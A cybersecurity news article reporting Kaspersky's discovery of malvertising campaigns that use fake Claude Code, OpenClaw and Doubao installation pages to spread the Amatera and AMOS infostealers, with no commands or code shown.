Emerging Threats in AI Development Tools
In March 2026, Kaspersky Threat Research uncovered a new malicious campaign that specifically targets developers seeking installation instructions for Claude Code, an AI development agent created by Anthropic. The attack begins with users searching for “Claude Code download,” where they are met with sponsored advertisements at the top of search results. These ads redirect users to a malicious webpage that closely mimics the official installation documentation for Claude Code.
This deceptive website is designed to look identical to the legitimate one, making it difficult for users to distinguish between the real and fake content. The page is hosted on Squarespace, a popular website-building and hosting platform, which adds to its credibility. Users who copy and execute the installation commands from this site unknowingly install malware that harvests sensitive information such as credentials, cryptocurrency wallet data, browser sessions, and other confidential files.
Similar tactics have been observed in campaigns targeting other popular AI tools, including OpenClaw. The attackers use the same method to trick users into downloading malicious software disguised as legitimate downloads for these tools.
Malware Variants Targeting Different Operating Systems
The malicious commands delivered through these fake installation instructions deploy different infostealers depending on the operating system:
Windows systems receive Amatera, an information-stealing malware. Amatera collects data from user directories, web browsers, and cryptocurrency wallets before sending the stolen information to a remote server. This malware has previously been associated with campaigns using the ClickFix distribution technique and operates under a Malware-as-a-Service (MaaS) model.
macOS systems receive AMOS, another infostealer that has been documented in several malware campaigns targeting Apple devices. Kaspersky researchers have previously reported on this threat.
Kaspersky’s findings also reveal that similar malicious campaigns have targeted other AI tools like OpenClaw and Doubao. Attackers registered multiple domains and distributed files containing the Amatera infostealer while disguising them as legitimate downloads for these tools.
Risks Posed to Developers and Businesses
Vladimir Gursky, a cybersecurity expert at Kaspersky, highlighted the significant risks posed by this campaign. He stated, “AI development tools such as Claude Code and OpenClaw are widely used not only by hobbyists and automation enthusiasts but also by professional developers working in large organizations. If infected, victims may unknowingly expose source code from active projects, confidential corporate data, authentication credentials, and private accounts. This makes such campaigns particularly dangerous for businesses whose developers rely on AI-assisted coding tools.”
Historical Context of Similar Attacks
In December 2025, Kaspersky detected another instance of a macOS infostealer being spread via Google Ads. In this case, a specially generated chat interface was designed to resemble a ChatGPT tutorial, pretending to guide users through installing the Atlas Browser. The malicious instructions appeared to be hosted on a legitimate site associated with OpenAI, helping attackers gain users’ trust.
These evolving threats underscore the importance of vigilance when downloading and installing AI development tools. Developers must remain cautious and verify the authenticity of sources before executing any installation commands. As cybercriminals continue to exploit the popularity of AI tools, staying informed and adopting robust security practices is more critical than ever.
